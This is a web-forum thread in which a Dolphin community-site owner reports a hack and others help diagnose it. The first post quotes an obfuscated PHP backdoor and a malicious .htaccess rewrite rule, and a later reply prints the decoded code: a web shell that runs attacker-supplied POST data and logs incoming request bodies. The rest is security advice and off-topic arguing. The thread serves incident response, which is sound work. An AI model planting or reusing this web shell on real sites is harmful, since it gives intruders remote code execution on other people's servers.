Hacked?

All my member and content links have been broken.

I have noticed I have a default.php in the site root and .htaccess was changed on a date when I did not log on to do any work or changes. I also notice a defaul folder with lots of files.

Content of default.php

<?php eval(gzinflate(base64_decode("BcFJkqowAADQu/Squ1xAlLG6eiEiCjIaBnHzC0kYgxiCgJz+v4enjHyXa/0sSDbi70fGsCT8QzjvEf7+0nLDamk/7/d68Oaul5qPDmang0NrnCJkascQc3MNG/10DMKJK+AWQVkVH0pOqEMzuXa1SPAVkqG5k7DwLERwNl+dfW8EzZ7MunM2TH+X0F8PymkdniEvp51cFrFg1JnnAMWrlSdL14aMGnQf/l0UumFrsaXIi8Q95ejF/Hi6Hp+kTvDAnFnivY5VEifzytAp8KDnEvIwuHOzFHsU1KmaNM86jsYWj+zmKvYuBNkHNPv6NXkRsw1tiicE7eFYJVReF/14tVSNitkYaJYgTwEgwDl3drtZtJWo5cmFyIBhYdJ34D+cih8vmWfn1/PQw+zKy/5yGgzZ7q3qfLvbRcRQjUkLJUezqDe4R4Qmc9eFUA5K1JE73HPOk6ekKjFdZpTk9mDLNIh7zKDHN8mCxFJIRGlh5r6FqpbdycsNrLAHa9r1ieOyXoh6DlScukUfck7NtypWurirga7AzkszOheMNnXE580GtTczomgrodwvPQTKZAT7j2heuFvv27JREPUyvyL3bMa0+lgtr1wdrB3SmEU3ebvhdlMx//19/fz8/P4H"))); ?>

Usually from uncomplicated password on your server side.

Change them all to hard to break passwords.

and my htaccess file has the following:

<IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteBase /
 RewriteCond %{REQUEST_FILENAME} !-f
 RewriteRule ^[a-z0-9]{1,4}[.](htm|jnlp|jar) default.php [L]
</IfModule>

So I was hacked? Im just going through trying to delete all the crap and might have to restore from backup.

Do you have backups set to run daily?

Or any backup at all?

If you had a lot of members it is best to use a clean backup.

Otherwise start fresh, or if your real good, replace the files in question.

Well I am not live yet so I do backups weekly at present onyl have a few members while its in testing.

restore has completed and its back up again. I have my suspect.. just need to find out from the log where the ip addresses are coming from.

Here are some security ideas.  First, all passwords should consist of upper and lower case letters, numerals, and symbols (some control panels may limit the symbols that can be used) and I would suggest going beyond the usual eight characters; the more characters the harder it is to crack the password.

Next, if you do not have a firewall on the server; if this was a server hack, then get the firewall in place.  Linux servers comes with iptables and it is a hardened firewall.  One thing you can do is to drop all connections to the server except your IP address.  Of course you have to open certain connections to the world, like port 80 for the webserver, etc.  There are excellent guides on the net for setting up iptables.

Make sure your ftp server is locked down to just those who needs access as well.  This could have been an hack through ftp.

 Yes I had that once.. It was putting there by a developer at boonex market. So I paid another developer to look for bugs then he found that code on my htaccess file... I guess one of the developer you give your FTP login info put it there...

bouchetalk ... you still have the biggest most active dolphin site??... just wondering

I had a look at the code you posted and it comes up with the following...

 @ error_reporting(0);
 @ ini_set("display_errors", 0);
 @ ini_set("log_errors", 0);
 @ ini_set("error_log", 0);
if (isset($_GET['r']))
{
 print $_GET['r'];
}
elseif(isset($_POST['e']))
{
 eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
}
elseif(isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary')
{
 $data = file_get_contents('php://input');
 if (strlen($data) > 0)
  print 'STATUS-IMPORT-OK';
 if (strlen($data) > 12)
 {
  $fp =  @ fopen('tmpfile', 'a');
   @ flock($fp, LOCK_EX);
   @ fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
   @ flock($fp, LOCK_UN);
   @ fclose($fp);
 }
}
exit;

The rewrite rule looks for a file with 4 letters/numbers and forwards that to a file called default.php, but it that is strange, since this file does not seem to do any thing strange. Could this have something to do with the cache file or ioncube?

Ps. what is the version of Dolphin you're running?

 I had dolphin version 7.1.2 when that developer put that code the htaccess.

 I have 4 sites Yes some of them are very active... about 80 to 150 people Join daily and return. No Spammer! they are real people.. one more year some of the sites will be amount the stars... fb, hi5, ------- Biggest also mean to me...how much $$$$ you make on your Google Absense daily or monthly...

 nahh i was just joking cause the one post you did where you said "make no mistake blah blha blah is the biggest site....." way back a couple months ago.. then i looked and you had the fake online member module running lol

 Lolll you want to call my members fake? I can't believe you... Is that gonna make your site on the top for calling my site fake??.. No Comment but You have ball....Yes my sites have more active members than your sites... YOu have a lot of fake members on the flashcoms chat still that's not my business. it does not matter the game you have to play to make your site successful.. Therefore; Respect! and Learn!

 Yeah I know who did work for me and he was pretty much useless so I guess that was his revenge attack on my site!

uhh not one person in the flashcoms chat is a fake account.. they dont even sale that option,, those are real chatters,, ill bump the thread im talking about

far as that "respect and learn" you are not even on my level.. i promise you that.. i know the online user module you use,, showing hundreds of online users yet zero in chat??.. come on now lol

 I am running 7.1.2 at the moment. But the strange thing it was created recently, so he must have got access somehow. I had got rid of him about 2 months ago.... I have changed all passwords to complex ones now. Is there a back door risk with 7.1.2?

this was the log file in the root...

 hear hear..!! That is the way I go.

I have sites with no members, but very good on adsense.

 One word of advise too, if your on a dedi, make sure your running "fail2ban" it locks out hackers that try to access your SSH.

I am on shared at the moment, but thanks for the tip, I do plan going dedicated once it starts to grow.

 bouchetalk worked on your site?

I think this is one for Boonex to answer

 Loll what a joke! ah ah I will never work for anyone. It's been 14yrs now.. Yes Never.. People work for me! I keep it very simple...

 Denre, Boonex does not provide "support."

LOL

[edit] Here is what you get... http://www.boonex.com/help/contact

[edit] box top right "Support" leads to the forums. Us.

 prolly wanna make sure one of those people are a "designer" next time

Mysportsbuddy, to answer your original question you were infected but it might not have been YOUR site that was hacked. The reason I say that is on shared hosting it could have been someone elses account that infected the whole server. That code is going to take people coming to the site from search engines and route them to the hackers porn or warez site. Time is a HUGE factor here because you need to delete all those files before the search engines re-index them. If not you're going to get that warning page on Google whenever someone clicks your link saying the site is infected.

In reference to the part about someone from here doing it that is probably not the case. Those hacks are automated. Now the person who worked on your site MIGHT have a virus on his home computer that is stealing FTP logins.

If you google part of that code you can see people with all types of software being infected, it isn't specific to Dolphin.

We're talkin' like a kid . you won! are you happy now lolll or should I put some cookies on the table.. To be honest I am blind as a bat therefore; can't see your Level....&  My Barrel is full can't hear anything either....

fight! fight! fight! 

...

put em away guys...

Love it how the subject of who has the biggest one always hijacks other threads....... gives us all something to laugh about : )

me tooo!

 Ha, in the real world if someone says it "bigger," 90% of the time it's really small, hence the big trucks and ego's. hahaha

i just started back posting cause this place has died off like i have never seen.. i mean i see HL dont even post anymore really,, and geek girl strutting stuff around.. figured id come try to spice things up a little

 if you really want to create spice why don't you create a new spicy thread :P

If you guys have your own issues please discuss else where. Can we remain in topic there. Thanks

 We did; just added a bit of spice as usual here.

You solved the problem right?

All good mate, done the restore and is ok now